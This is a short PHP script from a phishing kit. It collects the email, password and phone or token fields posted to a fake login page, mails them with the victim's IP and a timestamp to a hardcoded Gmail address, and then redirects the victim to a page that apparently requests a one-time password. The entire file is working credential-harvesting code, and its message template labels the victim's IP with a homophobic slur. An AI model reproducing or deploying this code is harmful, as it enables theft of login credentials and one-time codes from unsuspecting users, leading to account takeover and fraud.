<?php

session_start();
$user = $_POST['email'];
$parola = $_POST['password'];
$parola1 = $_POST['password1'];
$date = date("Y-m-d H:i:s");
$ip = $_SERVER['REMOTE_ADDR'];

$subj = "$ip";

$msg1 ="
<html><body>
<font face=\"Courier New\">
==========================================
<BR /><BR />
[USERNAME] $user<BR />
[PASSWORD] $parola<BR />
[FAGGOT IP] $ip<BR />
[DATA MASII] $date<BR /><BR />
==========================================
</font></body></html>
";

$msg2 ="
<html><body>
<font face=\"Courier New\">
==========================================
<BR /><BR />
[TOKEN] $user<BR />
[password] $parola<BR />
[telefon] $parola1<BR />
[FAGGOT IP] $ip<BR />
[DATA MASII] $date<BR /><BR />
==========================================
</font></body></html>
";

$from = "From: bl <hacker@forever.org>\n";
$from .= "MIME-Version: 1.0\r\n";
$from .= "Content-Type: text/html; charset=ISO-8859-1\r\n";

if(@$_GET['accedi']=='login'){
	mail("cezariulius904@gmail.com", $subj, $msg1, $from);
	header( "Location: richiesta_otp.html" );
}else{
	mail("cezariulius904@gmail.com", $subj, $msg2, $from);
	header( "Location: index1.html" );
}
?>